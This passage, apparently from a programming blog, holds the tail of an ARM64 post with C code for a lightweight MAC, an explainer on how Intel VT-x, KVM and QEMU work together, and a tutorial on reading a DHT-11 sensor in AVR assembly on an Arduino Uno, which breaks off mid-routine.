#define F(a,b)for(a=0;a<b;a++)
typedef unsigned int W;
typedef unsigned char B;

// max message for current parameters is 1792 bytes
void lm(B*b,W l,B*k,B*t) {
    int i,j,s;
    B   m[BLK_LEN];

    // initialize tag T
    F(i,TAG_LEN)t[i]=0;

    for(s=1,j=0; l>=M_LEN; s++,l-=M_LEN) {
      // add 8-bit counter S 
      m[0] = s;
      // add bytes to M 
      F(j,M_LEN)
        m[CTR_LEN+j]=*b++;
      // encrypt M with K1
      E(k,m);
      // update T
      F(i,TAG_LEN)t[i]^=m[i];
    }
    // copy remainder of input
    F(i,l)m[i]=b[i];
    // add end bit
    m[i]=0x80;
    // update T 
    F(i,l+1)t[i]^=m[i];
    // encrypt T with K2
    k+=BC_KEY_LEN;
    E(k,t);
}
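The 1,792-byte limit appears to follow from simple arithmetic: an 8-bit counter has 256 values, and each block carries BLK_LEN - CTR_LEN = 7 message bytes. The helper below just reproduces that calculation; it is my own illustration (`lm_max_bytes` is a hypothetical name), not part of the MAC.

```c
#include <stddef.h>

/* Largest input, in bytes, if every value of a ctr_len-byte counter
   could label one block of blk_len - ctr_len message bytes. */
static size_t lm_max_bytes(size_t ctr_len, size_t blk_len) {
    size_t counters = (size_t)1 << (8 * ctr_len);
    return counters * (blk_len - ctr_len);
}
```

With CTR_LEN 1 and BLK_LEN 8 this gives 256 * 7 = 1,792. Since the loop above starts the counter at 1, the code as written probably has slightly less headroom than that before the counter wraps.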

No assembly for this right now, but feel free to have a go!

8. Summary

ARM expects its “Deimos” design, scheduled for 2019, and “Hercules”, scheduled for 2020, to outperform any laptop-class CPU from Intel. The A76 supports A32 and T32 only in user mode (EL0), and it’s highly likely that later designs will drop them entirely. The ARM64 instruction set is almost perfect. The only minor thing that annoys me is how the x30 register (Link Register) must be saved across calls to subroutines. There are also no rotate-left or modulus instructions, which would be useful.
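Both missing operations are easy to build from what is there. A rotate left by n is a rotate right by 32 - n, and a remainder falls out of a divide followed by a multiply-subtract (the UDIV and MSUB pair). A minimal C sketch of the two identities, with function names of my own choosing:

```c
#include <stdint.h>

/* Rotate right, which A64 provides directly as ROR. */
static uint32_t ror32(uint32_t v, unsigned n) {
    n &= 31;
    return n ? (v >> n) | (v << (32 - n)) : v;
}

/* Rotate left by n, expressed as a rotate right by 32 - n. */
static uint32_t rol32(uint32_t v, unsigned n) {
    return ror32(v, (32 - (n & 31)) & 31);
}

/* Remainder from a divide followed by a multiply-subtract,
   the same shape as a UDIV + MSUB pair. Assumes b != 0. */
static uint32_t umod32(uint32_t a, uint32_t b) {
    uint32_t q = a / b;      /* UDIV */
    return a - q * b;        /* MSUB */
}
```

This is why every R macro in the listings above is written as a right rotation, even where the cipher specification describes a left one.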

All code shown here can be found in this GitHub repo.

Intel Virtualisation: How VT-x, KVM and QEMU Work Together

VT-x is the name of Intel’s CPU virtualisation technology. KVM is the component of the Linux kernel that makes use of VT-x. QEMU is a user-space application that allows users to create virtual machines, and it uses KVM to achieve efficient virtualisation. In this article we will talk about how these three technologies work together. Don’t expect an in-depth exposition of every aspect here, although in future I might follow this up with more focused posts about specific parts.

Something About Virtualisation First

Let’s first touch upon some theory before going into the main discussion. Related to virtualisation is the concept of emulation: in simple words, faking the hardware. When you use QEMU or VMware to create a virtual machine that has an ARM processor while your host machine has an x86 processor, QEMU or VMware emulates, or fakes, the ARM processor. When we talk about virtualisation we mean hardware-assisted virtualisation, where the VM’s processor matches the host computer’s processor. Often conflated with virtualisation is the quite distinct concept of containerisation. Containerisation is mostly a software concept and builds on operating system abstractions such as process identifiers, file systems and memory consumption limits. We won’t discuss containers any further in this post.

A typical VM setup looks like this:

vm-arch

 

At the lowest level is the hardware, which supports virtualisation. Above it sits the hypervisor, or virtual machine monitor (VMM). In the case of KVM, this is actually the Linux kernel with the KVM modules loaded into it. In other words, KVM is a set of kernel modules that, when loaded into the Linux kernel, turn the kernel into a hypervisor. Above the hypervisor, in user space, sit the virtualisation applications that end users interact with directly: QEMU, VMware and so on. These applications then create virtual machines which run their own operating systems, with cooperation from the hypervisor.

Finally, there is the “full” vs. “para” virtualisation dichotomy. Full virtualisation is when the OS running inside a VM is exactly the same as would run on real hardware. Paravirtualisation is when the OS inside the VM is aware that it is being virtualised and therefore runs in a slightly different way than it would on real hardware.

VT-x

VT-x is CPU virtualisation for the Intel 64 and IA-32 architectures. For Intel’s Itanium, there is VT-i. For I/O virtualisation there is VT-d. AMD also has its own virtualisation technology, called AMD-V. We will only concern ourselves with VT-x.

Under VT-x a CPU operates in one of two modes: root and non-root. These modes are orthogonal to real mode, protected mode, long mode etc., and also orthogonal to the privilege rings (0-3). They form a new “plane”, so to speak. The hypervisor runs in root mode and VMs run in non-root mode. In non-root mode, CPU-bound code mostly executes in the same way as it would in root mode, which means that a VM’s CPU-bound operations run mostly at native speed. However, non-root code doesn’t have full freedom.

Privileged instructions form a subset of all the instructions available on a CPU. These are instructions that can only be executed if the CPU is in a more privileged state, e.g. current privilege level (CPL) 0 (where CPL 3 is the least privileged). A subset of these privileged instructions are what we can call “global state-changing” instructions: those which affect the overall state of the CPU. Examples are instructions which modify clock or interrupt registers, or write to control registers in a way that would change the operation of root mode. This smaller subset of sensitive instructions is what non-root mode can’t execute.

VMX and VMCS

Virtual Machine Extensions (VMX) are instructions that were added to facilitate VT-x. Let’s look at some of them to gain a better understanding of how VT-x works.

VMXON: Before this instruction is executed, there is no concept of root vs non-root modes. The CPU operates as if there was no virtualisation. VMXON must be executed in order to enter virtualisation. Immediately after VMXON, the CPU is in root mode.

VMXOFF: Converse of VMXON, VMXOFF exits virtualisation.

VMLAUNCH: Creates an instance of a VM and enters non-root mode. We will explain what we mean by “instance of VM” in a short while, when covering VMCS. For now think of it as a particular VM created inside QEMU or VMWare.

VMRESUME: Enters non-root mode for an existing VM instance.

When a VM attempts to execute an instruction that is prohibited in non-root mode, the CPU immediately switches to root mode in a trap-like way. This is called a VM exit.

Let’s synthesise the above information. The CPU starts in normal mode and executes VMXON to start virtualisation in root mode. It then executes VMLAUNCH to create a VM instance and enter non-root mode for it. The VM instance runs its own code as if running natively until it attempts something that is prohibited, which causes a VM exit and a switch to root mode. Recall that the software running in root mode is the hypervisor. The hypervisor deals with the reason for the VM exit and then executes VMRESUME to re-enter non-root mode for that VM instance, which lets the VM instance resume its operation. This interaction between root and non-root mode is the essence of hardware virtualisation support.

Of course the above description leaves some gaps. For example, how does the hypervisor know why a VM exit happened? And what makes one VM instance different from another? This is where the VMCS comes in. VMCS stands for Virtual Machine Control Structure. It is basically a 4 KiB region of physical memory which contains the information needed for the above process to work. This information includes the reasons for a VM exit as well as information unique to each VM instance, so that when the CPU is in non-root mode, it is the VMCS which determines which instance of a VM it is running.
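The sequence above is essentially a small state machine. The following toy model in C only tracks which mode the CPU is in and rejects steps that make no sense in the current mode. It is purely illustrative: the type and function names are mine, and nothing here touches real VMX hardware.

```c
#include <stdbool.h>

/* Toy model of the VMX operating modes described above. */
enum cpu_mode { MODE_NORMAL, MODE_ROOT, MODE_NON_ROOT };

struct toy_cpu {
    enum cpu_mode mode;
    bool launched;      /* has the VM instance been launched yet? */
    unsigned exits;     /* number of VM exits seen so far */
};

/* Each step returns false when it is not allowed in the current mode. */
static bool vmxon(struct toy_cpu *c) {
    if (c->mode != MODE_NORMAL) return false;
    c->mode = MODE_ROOT;
    return true;
}

static bool vmlaunch(struct toy_cpu *c) {
    if (c->mode != MODE_ROOT || c->launched) return false;
    c->launched = true;
    c->mode = MODE_NON_ROOT;
    return true;
}

static bool vmresume(struct toy_cpu *c) {
    if (c->mode != MODE_ROOT || !c->launched) return false;
    c->mode = MODE_NON_ROOT;
    return true;
}

/* The guest tried something prohibited: trap back to root mode. */
static bool vm_exit(struct toy_cpu *c) {
    if (c->mode != MODE_NON_ROOT) return false;
    c->mode = MODE_ROOT;
    c->exits++;
    return true;
}

static bool vmxoff(struct toy_cpu *c) {
    if (c->mode != MODE_ROOT) return false;
    c->mode = MODE_NORMAL;
    c->launched = false;
    return true;
}
```

A typical run is vmxon, vmlaunch, then any number of vm_exit and vmresume pairs, and finally vmxoff from root mode.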

As you may know, in QEMU or VMware we can decide how many CPUs a particular VM will have. Each such CPU is called a virtual CPU or vCPU. For each vCPU there is one VMCS. This means that the VMCS stores information at vCPU granularity, not VM granularity. To read and write a particular VMCS, the VMREAD and VMWRITE instructions are used. They effectively require root mode, so only the hypervisor can modify the VMCS. A non-root VM can perform VMWRITE, though not to the actual VMCS but to a “shadow” VMCS, something that doesn’t concern us immediately.

There are also instructions that operate on whole VMCS instances rather than on individual fields within a VMCS. These are used when switching between vCPUs, where a vCPU could belong to any VM instance. VMPTRLD is used to load the address of a VMCS and VMPTRST is used to store this address to a specified memory address. There can be many VMCS instances but only one is marked as current and active at any point. VMPTRLD marks a particular VMCS as active. Then, when VMRESUME is executed, the non-root mode VM uses that active VMCS instance to know which particular VM and vCPU it is executing as.

Here it’s worth noting that all the VMX instructions above require CPL 0, so they can only be executed from inside the Linux kernel (or another OS kernel).

VMCS basically stores two types of information:

  1. Context info which contains things like CPU register values to save and restore during transitions between root and non-root.
  2. Control info which determines behaviour of the VM inside non-root mode.

More specifically, VMCS is divided into six parts.

  1. Guest-state stores vCPU state on VM exit. On VMRESUME, vCPU state is restored from here.
  2. Host-state holds the host CPU state that the hypervisor sets up before VMLAUNCH and VMRESUME. On VM exit, host CPU state is restored from here.
  3. VM execution control fields determine the behaviour of VM in non-root mode. For example hypervisor can set a bit in a VM execution control field such that whenever VM attempts to execute RDTSC instruction to read timestamp counter, the VM exits back to hypervisor.
  4. VM exit control fields determine the behaviour of VM exits. For example, when a bit in VM exit control part is set then debug register DR7 is saved whenever there is a VM exit.
  5. VM entry control fields determine the behaviour of VM entries. This is counterpart of VM exit control fields. A symmetric example is that setting a bit inside this field will cause the VM to always load DR7 debug register on VM entry.
  6. VM exit information fields tell hypervisor why the exit happened and provide additional information.

There are other aspects of hardware virtualisation support that we will conveniently gloss over in this post. Translation of guest-physical addresses to host-physical addresses is done using a VT-x feature called Extended Page Tables (EPT). The Translation Lookaside Buffer (TLB) is used to cache virtual-to-physical mappings in order to save page table lookups, and TLB semantics also change to accommodate virtual machines. The Advanced Programmable Interrupt Controller (APIC) on a real machine is responsible for managing interrupts. In a VM this too is virtualised, and there are virtual interrupts which can be controlled by one of the control fields in the VMCS. I/O is a major part of any machine’s operations. Virtualising I/O is not covered by VT-x and is usually emulated in user space or accelerated by VT-d.

KVM

Kernel-based Virtual Machine (KVM) is a set of Linux kernel modules that, when loaded, turn the Linux kernel into a hypervisor. Linux continues its normal operation as an OS but also provides hypervisor facilities to user space. KVM modules can be grouped into two types: the core module and machine-specific modules. kvm.ko is the core module and is always needed. Depending on the host machine’s CPU, a machine-specific module such as kvm-intel.ko or kvm-amd.ko will also be needed. As you can guess, kvm-intel.ko uses the functionality we described above in the VT-x section. It is KVM which executes VMLAUNCH/VMRESUME, sets up the VMCS, deals with VM exits etc. Let’s also mention that AMD’s virtualisation technology, AMD-V, has its own instructions, called Secure Virtual Machine (SVM). Under `arch/x86/kvm/` you will find files named `svm.c` and `vmx.c`. These contain the code which deals with the virtualisation facilities of AMD and Intel respectively.

KVM interacts with user space (in our case QEMU) in two ways: through the device file `/dev/kvm` and through memory-mapped pages. Memory-mapped pages are used for bulk transfer of data between QEMU and KVM. More specifically, there are two memory-mapped pages per vCPU, and they are used for high-volume data transfer between QEMU and the VM in the kernel.

`/dev/kvm` is the main API exposed by KVM. It supports a set of `ioctl`s which allow QEMU to manage VMs and interact with them. The lowest unit of virtualisation in KVM is a vCPU; everything builds on top of it. The `/dev/kvm` API is a three-level hierarchy.

  1. System Level: Calls to this API manipulate the global state of the whole KVM subsystem. This, among other things, is used to create VMs.
  2. VM Level: Calls to this API deal with a specific VM. vCPUs are created through calls to this API.
  3. vCPU Level: This is the lowest-granularity API and deals with a specific vCPU. Since QEMU dedicates one thread to each vCPU (see the QEMU section below), calls to this API are made in the same thread that was used to create the vCPU.

After creating a vCPU, QEMU continues interacting with it using the `ioctl`s and memory-mapped pages.
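To make the three levels concrete, here is a minimal sketch that walks down the hierarchy once: it opens `/dev/kvm`, creates a VM, creates one vCPU, and maps that vCPU's shared region. It uses the ioctls from `<linux/kvm.h>` as I understand them and needs a Linux host with kernel headers; the function name `kvm_walk_levels` is my own. It sets up no guest memory or registers, so it stops short of actually running anything.

```c
#include <fcntl.h>
#include <stddef.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <unistd.h>
#include <linux/kvm.h>

/* Walk the three API levels once. Returns 0 on success, -1 if any step
   fails (for example when /dev/kvm is missing or not accessible). */
static int kvm_walk_levels(void) {
    int rc = -1, vm = -1, vcpu = -1, size;
    void *run;
    int kvm = open("/dev/kvm", O_RDWR);
    if (kvm < 0) return -1;

    /* System level: check the API version and create a VM. */
    if (ioctl(kvm, KVM_GET_API_VERSION, 0) != KVM_API_VERSION) goto out;
    vm = ioctl(kvm, KVM_CREATE_VM, 0);
    if (vm < 0) goto out;

    /* VM level: create vCPU number 0. */
    vcpu = ioctl(vm, KVM_CREATE_VCPU, 0);
    if (vcpu < 0) goto out;

    /* vCPU level: map the region shared between KVM and user space. */
    size = ioctl(kvm, KVM_GET_VCPU_MMAP_SIZE, 0);
    if (size <= 0) goto out;
    run = mmap(NULL, (size_t)size, PROT_READ | PROT_WRITE,
               MAP_SHARED, vcpu, 0);
    if (run == MAP_FAILED) goto out;

    munmap(run, (size_t)size);
    rc = 0;
out:
    if (vcpu >= 0) close(vcpu);
    if (vm >= 0) close(vm);
    close(kvm);
    return rc;
}
```

Note how each level hands back a new file descriptor: the system fd creates the VM fd, and the VM fd creates the vCPU fd that later calls operate on.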

QEMU

Quick Emulator (QEMU) is the only user-space component we are considering in our VT-x/KVM/QEMU stack. With QEMU one can run a virtual machine with an ARM or MIPS core on an Intel host. How is this possible? Basically QEMU has two modes: emulator and virtualiser. As an emulator, it can fake the hardware, so it can make itself look like a MIPS machine to the software running inside its VM. It does that through binary translation. QEMU comes with the Tiny Code Generator (TCG), which can be thought of as a sort of high-level language VM, like the JVM. It takes, for instance, MIPS code and converts it to an intermediate bytecode, which then gets executed on the host hardware.

The other mode of QEMU, as a virtualiser, is what achieves the type of virtualisation that we are discussing here. As a virtualiser it gets help from KVM, talking to it using `ioctl`s as described above.

QEMU creates one process for every VM. For each vCPU, QEMU creates a thread. These are regular threads and they get scheduled by the OS like any other thread. As these threads get run time, QEMU creates the impression of multiple CPUs for the software running inside its VM. Given QEMU’s roots in emulation, it can emulate I/O, which is something that KVM may not fully support; take the example of a VM with a particular serial port on a host that doesn’t have one. Now, when software inside the VM performs I/O, the VM exits to KVM. KVM looks at the reason and passes control to QEMU along with a pointer to info about the I/O request. QEMU emulates the I/O device for that request, thus fulfilling it for the software inside the VM, and passes control back to KVM. KVM executes a VMRESUME to let that VM proceed.
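The user-space half of that round trip boils down to a switch on the exit reason. The sketch below is not QEMU's code: `handle_exit`, `toy_serial` and the choice of port 0x3f8 are assumptions for illustration. It does use the real `struct kvm_run` layout from `<linux/kvm.h>`, in which an I/O exit describes the port, direction and size, and the data sits inside the shared mapping at `data_offset`.

```c
#include <stddef.h>
#include <stdint.h>
#include <linux/kvm.h>

#define SERIAL_PORT 0x3f8   /* hypothetical emulated device: a COM1-style port */

/* Collects the bytes the guest writes to the emulated serial port. */
struct toy_serial { char out[64]; size_t len; };

/* Handle one exit reported in `run`. Returns 1 if the vCPU should be
   resumed, 0 if the guest halted, -1 for an exit we do not handle. */
static int handle_exit(struct kvm_run *run, struct toy_serial *dev) {
    switch (run->exit_reason) {
    case KVM_EXIT_IO: {
        /* The I/O data lives inside the shared mapping, at data_offset. */
        uint8_t *data = (uint8_t *)run + run->io.data_offset;
        size_t n = (size_t)run->io.size * run->io.count;
        if (run->io.direction != KVM_EXIT_IO_OUT ||
            run->io.port != SERIAL_PORT)
            return -1;
        for (size_t i = 0; i < n && dev->len < sizeof dev->out; i++)
            dev->out[dev->len++] = (char)data[i];
        return 1;
    }
    case KVM_EXIT_HLT:
        return 0;
    default:
        return -1;
    }
}
```

In a real vCPU thread this would sit in a loop around the KVM_RUN ioctl: run the guest, handle the exit, and run again for as long as the handler asks to resume.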

In the end, let us summarise the overall picture in a diagram:

overall-diag

How to program an Arduino in assembly

Reading data from a DHT-11 temperature sensor on a “bare-metal” Arduino Uno (ATmega328p) using only assembly

Let’s use a simple example to look at how you can “hack” an Arduino Uno and start writing programs in machine code, that is, in assembly for the ATmega328p microcontroller. Most of the inexpensive “classic” “duino” boards are built around this microcontroller. The code will also run on practically any demo board with an ATmega328p and, after possibly some minor changes, on any Arduino board with an Atmel AVR microcontroller. In this example I tried to get as close to the hardware as possible. To better understand how the microcontroller works, we won’t use any ready-made libraries, let alone the Arduino IDE. As a training exercise we’ll do the simplest thing possible: wiggle a single microcontroller pin in a correct and useful way, that is, read data from a DHT-11 temperature and humidity sensor.

Arduino is a very cool thing, but much of what goes on inside the microcontroller is deliberately hidden in the depths of the Arduino libraries and environment so as not to scare beginners. After playing with a blinking LED, I wanted to understand how the microcontroller actually works. Besides scratching a purely intellectual itch, knowing how the microcontroller and its standard means of talking to the outside world (called “peripherals”) work is an advantage when writing code both for Arduino and in C/assembly for microcontrollers, and it helps you write more efficient programs. So, we’ll do everything as close to the hardware as we can. We have: an Arduino Uno compatible board, a DHT-11 sensor, three wires, Atmel Studio, and machine code.

First, let’s prepare the equipment we need.

We’ll write the code in Atmel Studio 7, a free download from the website of the microcontroller’s manufacturer, Atmel.

Atmel Studio 7

All the code was run on an Arduino Uno clone; mine is a DFRduino Uno from DFRobot, with an ATmega328p controller running at 16 MHz. It’s an excellent, reliable board. I haven’t noticed any differences from a standard Uno in use. A similar black board from DFRobot, only a “Mega”, flew for two years as the flight controller of my quadcopter; wherever it ended up, there were no problems.

DFRduino Uno

To view signals that last microseconds (that’s one millionth of a second, by the way), I used a thing called a “logic analyzer”. Specifically, I used a clone of the eight-channel USBEE AX Pro. How you would debug such fast processes without an oscilloscope or a logic analyzer, I honestly don’t know and can’t recommend anything.

First of all I connected my Uno clone (as I said, mine is a DFRduino Uno) to Atmel Studio 7 and decided to try blinking an LED in assembly. How to connect it is described in many places; one example is linked at the end. The code is written directly in the studio, and the board can be flashed over the USB port using the familiar Arduino bootloader, via AVRDude. You can also flash it with an external programmer; I tried a Chinese USBASP, and in practice both methods worked for me. In both cases you just need to configure the AVRDude flasher correctly; an example of my settings is in the picture.

Full argument string:
-C "C:\avrdude\avrdude.conf" -p atmega328p -c arduino -P COM7 -b 115200 -U flash:w:"$(ProjectDir)Debug\$(TargetName).hex":i

In the end, for simplicity I settled on flashing over the USB port, which is the standard way for Arduino. My UNO has an ATmega328P chip, and that is what must be specified when creating the project. You also need to select the port the Arduino is connected to; on my computer it was COM7.

To simply blink an LED no extra connections are needed: we’ll use the LED on the board, connected to Arduino pin D13, which, let me remind you, is pin 5 of the controller’s “PORTB” port.

Connect the board to the computer with a USB cable, write the code in the studio, and flash it straight from the studio. The main problem here is actually seeing the blinking: the controller runs at 16 MHz, and if we switch the LED on and off at that rate, all we’ll see is a dimly lit LED.

To see when it is lit and when it is off, we’ll turn the LED on and keep the processor busy with some useless work for about 1 second. The delay itself can be worked out by hand from the clock frequency (most instructions take one clock cycle), or with the dedicated calculator linked below. With the delay in place, code that does roughly what the classic Arduino “Blink” does might look something like this:

			cli
			sbi DDRB, 5	; PORT B, pin 5 as output
			sbi PORTB, 5	; drive pin 5 high (logic one)

loop:						    ; delay ~1000 ms
			ldi  r18, 82
			ldi  r19, 43
			ldi  r20, 0
L1:			dec  r20
			brne L1
			dec  r19
			brne L1
			dec  r18
			brne L1
			nop
			
			in R16, PORTB	; toggle bit 5 of the port with XOR
			ldi R17, 0b00100000
			EOR R16, R17
			out PORTB, R16
			
			rjmp loop
Once again: on my board the Arduino LED (D13) sits on pin 5 of the ATmega’s PORTB.
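To sanity-check the delay by hand, the three-register loop in the listing above can be modelled in C. This is a rough sketch rather than part of the firmware: `delay_cycles` is a hypothetical helper, and the timings it assumes (1 cycle for LDI, DEC and NOP, 2 cycles for a taken BRNE, 1 for one that falls through) are the usual AVR figures as I understand them.

```c
#include <stdint.h>

/* Count the clock cycles used by the delay loop, from the first LDI
   to the trailing NOP. 8-bit registers wrap from 0 to 255 on DEC. */
static unsigned long delay_cycles(uint8_t r18, uint8_t r19, uint8_t r20) {
    unsigned long cycles = 3;                     /* three LDI instructions */
    for (;;) {
        r20--; cycles++;                          /* dec r20 */
        if (r20 != 0) { cycles += 2; continue; }  /* brne L1, taken */
        cycles++;                                 /* brne L1, not taken */
        r19--; cycles++;                          /* dec r19 */
        if (r19 != 0) { cycles += 2; continue; }
        cycles++;
        r18--; cycles++;                          /* dec r18 */
        if (r18 != 0) { cycles += 2; continue; }
        cycles++;
        break;
    }
    return cycles + 1;                            /* trailing NOP */
}
```

With the values from the listing, `delay_cycles(82, 43, 0)` comes to 15,999,997 cycles, a hair under one second at 16 MHz.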

Strictly speaking, this is not a good way to write code, because we have completely ignored such important things as the stack and the interrupt vector table (more on them later).

OK, the LED blinks. To make the GPIO practice a bit more meaningful, let's now read values from a DHT11 sensor, again entirely in assembly.

To read data from the sensor, we have to drive high and low levels on its data line in the right sequence; this is exactly what "wiggling a microcontroller pin" means. On the one hand there is nothing complicated here; on the other hand it is a meaningful activity: we measure temperature and humidity, which can be considered a first step towards building some kind of "weather station" in the future.

Looking one step ahead, it is worth asking what we will actually do with the data. Say we have read the sensor and stored 23 degrees Celsius in a variable in the controller's memory. How do we look at that number? There is a solution: I will view the data on a desktop computer, sending it through the controller's USART over a virtual COM port on a USB cable straight into a terminal program such as PuTTY. For the computer to be able to read our data we will use a USB-TTL converter, the gadget that provides the virtual COM port in Windows.

The wiring might look roughly like this:

The sensor's signal pin is connected to pin 2 (PIN2) of the controller's PORTD or, which is the same thing, to the Arduino D2 pin. It is also pulled up to the supply "plus" through a 4.7 kΩ resistor. The sensor's plus and minus go to the corresponding power rails. The USB-TTL adapter is connected to the Tx output of the Arduino's USART, that is, PIN1 of the controller's PORTD.

Assembled on a breadboard:

Let's look at the sensor and its datasheet. The sensor itself is simple and uses a single signal wire, which must be pulled up to +5 V through a resistor; this gives the idle "high" level on the line. If the line is free, i.e. neither the controller nor the sensor is transmitting, the line sits at that idle high level. When the sensor or the controller transmits, it occupies the line by pulling it low for some time. In total the sensor sends 5 bytes, one after another: first the humidity readings, then the temperature, and finally a checksum, schematically "HHTTX" (see the datasheet for details). Five bytes are 40 bits, and each bit is encoded in a special way during transmission.

For simplicity, we will treat a "high" level on the line as "one" and a "low" level as "zero". According to the datasheet, to start talking to the sensor the controller must pull the signal line to ground, i.e. put a zero on the line, hold it for about 20 ms (the datasheet asks for at least 18 ms), and then release the line abruptly. In response the sensor should put its message on the line: a train of high and low levels of varying duration that encodes the 40 bits we need. If the controller reads this message successfully, we immediately learn that: a) the sensor actually responded, b) it sent humidity and temperature data, c) it sent a checksum. At the end of the transmission the sensor releases the line. The datasheet also states that the sensor should be polled no more than once per second.

So, what the microcontroller has to do, according to the datasheet, for the sensor to answer: hold the line low for 20 milliseconds, release it, and quickly start watching the line:

The sensor should respond by pulling the line to zero for 80 microseconds (µs) and then releasing it for another 80 µs. This can be taken as confirmation that the sensor is alive on the line and responding:

Right after that, on the falling edge from high to low, the sensor starts sending 40 individual bits. Each bit is encoded by a pulse pair made of two intervals. First the sensor occupies the line (pulls it to zero) for a certain time, a kind of first "half-bit". Then the sensor releases the line (it is pulled up to one), also for a certain time; this is the second "half-bit". The duration of these "half-bits" in microseconds encodes what the sensor is sending: a "zero" bit or a "one" bit.

Consider the bit encoding: the first "half-bit" is always low and of fixed duration, about 50 µs. The duration of the second "half-bit" determines what the sensor is actually sending.

To send a zero, a high level lasting 26–28 µs is used:

To send a one, the high level is stretched to 70 µs:

We will not measure the duration of each interval precisely. It is enough to know that if the second "half-bit" is shorter than the first, a zero is encoded, and if the second "half-bit" is longer, a one is encoded. We have 40 bits, each encoded by two intervals, so we need to read 80 intervals in total. Once the 80 intervals are read, we compare them in pairs, the first "half-bit" against the second.

That all looks simple, so what does the microcontroller need to do to read the sensor? It pulls the pin to zero and then reads the whole long message from the sensor on the same pin. Along the way we split the message into "half-bits", working out where a zero bit is sent and where a one. Then we assemble the resulting bits into bytes, which are the humidity and temperature data we are after.
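
The decoding rule just described (compare the low and high interval of each pair, then pack the bits most significant bit first) can be sketched on the host side. This is an illustrative Python model, not the project's code; both function names are hypothetical, and `encode_dht11` exists only to produce demo input from the nominal datasheet timings (50 µs low, about 27 µs or 70 µs high).

```python
def decode_dht11(intervals):
    """Turn 80 measured durations (low, high, low, high, ...) into 5 bytes.

    A bit is 1 when its high interval is longer than the preceding low one.
    Bits are packed most significant bit first.
    """
    if len(intervals) != 80:
        raise ValueError("expected 80 intervals (40 bits x 2)")
    data = bytearray(5)
    for bit in range(40):
        low, high = intervals[2 * bit], intervals[2 * bit + 1]
        shifted = (data[bit // 8] << 1) & 0xFF
        data[bit // 8] = shifted | (1 if high > low else 0)
    return bytes(data)


def encode_dht11(payload):
    """Demo helper (hypothetical): ideal pulse lengths in microseconds."""
    out = []
    for byte in payload:
        for shift in range(7, -1, -1):          # MSB first
            out += [50, 70 if (byte >> shift) & 1 else 27]
    return out


frame = bytes([0x34, 0x00, 0x21, 0x00, 0x55])   # made-up sample frame
assert decode_dht11(encode_dht11(frame)) == frame
```

Because only the relative length of the two intervals matters, the same function works on raw loop counts instead of microseconds.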

OK, let's start writing code. First we check whether the sensor works at all: we simply hold the line low for 20 ms and watch with a logic analyzer what happens on the line.

Definitions:

; ==========		DEFINES =======================================
; definitions for the port the DHT11 is connected to
				.EQU DHT_Port=PORTD
				.EQU DHT_InPort=PIND
				.EQU DHT_Pin=PORTD2
				.EQU DHT_Direction=DDRD
				.EQU DHT_Direction_Pin=DDD2

				.DEF Tmp1=R16
				.DEF USART_ByteR=R17		; byte to send through the USART
				.DEF Tmp2=R18
				.DEF USART_BytesN=R19		; number of bytes to send to the USART
				.DEF Tmp3=R20
				.DEF Cycle_Count=R21		; loop counter in EXPECT_x
				.DEF ERR_CODE=R22			; error code returned from subroutines
				.DEF N_Cycles=R23			; counter in READ_CYCLES
				.DEF ACCUM=R24
				.DEF Tmp4=R25

As mentioned, the sensor is connected to pin 2 of port D. On the Arduino Uno this is digital pin D2 (check the Arduino pinout).

We do everything the dumb way: configure the pin as an output, drive it to zero, wait 20 milliseconds, release the line, switch the pin to input mode, and wait for signals to appear on the pin.

;============	DHT11 INIT =======================================
; right after initialization we must immediately (!) read the sensor's response and the data itself
DHT_INIT:		CLI	; once more, just in case: this is a timing-critical section

				; preload X for READ_CYCLES, which has no time to initialize it
				LDI XH, High(CYCLES)	; load the high byte of the CYCLES address
				LDI XL, Low (CYCLES)	; load the low byte of the CYCLES address

				LDI Tmp1, (1<<DHT_Direction_Pin)
				OUT DHT_Direction, Tmp1			; port D, pin 2 as output

				LDI Tmp1, (0<<DHT_Pin)
				OUT DHT_Port, Tmp1			; drive 0

				RCALL DELAY_20MS		; wait 20 milliseconds

				LDI Tmp1, (1<<DHT_Pin)		; release the line: drive 1
				OUT DHT_Port, Tmp1

				RCALL DELAY_10US		; wait 10 microseconds


				LDI Tmp1, (0<<DHT_Direction_Pin)		; port D, pin 2 as input
				OUT DHT_Direction, Tmp1
				LDI Tmp1,(1<<DHT_Pin)		; enable the internal pull-up in addition to the external resistor on the line
				OUT DHT_Port, Tmp1

; wait for the sensor's response: it should pull the line low for 80 us and release it for 80 us

Let's check with the analyzer: did the sensor respond?

Yes, there is a response: the signals following our initial 20 ms pulse are the sensor's answer. To view the message I used a Chinese clone of the USBEE AX Pro connected to the sensor's signal wire.

Let's zoom in to see the end of our 20 ms pulse and get a better look at the start of the sensor's message. Everything is as in the datasheet: first the sensor drives the low and high levels for 80 µs each, then it starts sending bits; in this case the second "half-bit" encodes a "0".

So the sensor works and has sent us data; now we need to read it correctly. Since this is a learning exercise, we will solve it by brute force. At the moment the sensor responds, i.e. on the transition from high to low, we start a loop with a counter of its iterations. Inside the loop we keep watching the level on the pin, waiting for the signal to return to high, which gives us the duration of the first "half-bit". Our microcontroller runs at 16 MHz, so during a period of, say, 50 microseconds it has about 800 clock cycles to work with. When the line goes high, we exit the loop cleanly and store the number of iterations counted in a variable.

After the line has gone high we do the same thing: count iterations until the sensor starts sending the next bit and pulls the line low. Fortunately, we do not need the exact duration of the pulses; it is enough to know that one interval is longer than the other. If the sensor sends a "zero" bit, the second "half-bit", and therefore the number of iterations we counted, will be shorter than the first "half-bit". If the sensor sends a "one" bit, the number of iterations counted during the second half-bit will be greater than during the first.

And so that we do not hang forever if the sensor does not respond or glitches, the loop runs only for a limited time, one that is guaranteed to exceed the longest pulse, so that if the sensor stays silent we can exit on a timeout.

The example below covers the case where the line is at zero and we count how many times the loop read the pin state before the sensor switched the line to one.

;=============	EXPECT 1 =========================================
; spin in a loop waiting for the required level on the pin
; exit as soon as it appears
; report how many iterations we waited
; or a timeout error if the level never appeared
EXPECT_1:		LDI Cycle_Count, 0			; clear the loop counter
			LDI ERR_CODE, 2			; error 2: exit on timeout

			ldi  Tmp1, 2			; load the constants of
			ldi  Tmp2, 169			; an 80 us delay (for an empty loop; the polling body stretches it)

EXP1L1:			INC Cycle_Count			; increment the loop counter

			IN Tmp3, DHT_InPort		; read the port
			SBRC Tmp3, DHT_Pin	; if the pin is 1
			RJMP EXIT_EXPECT_1	; then exit
			dec  Tmp2			; otherwise keep spinning in the delay
			brne EXP1L1
			dec  Tmp1
			brne EXP1L1
			NOP					; timeout exit lands here
			RET

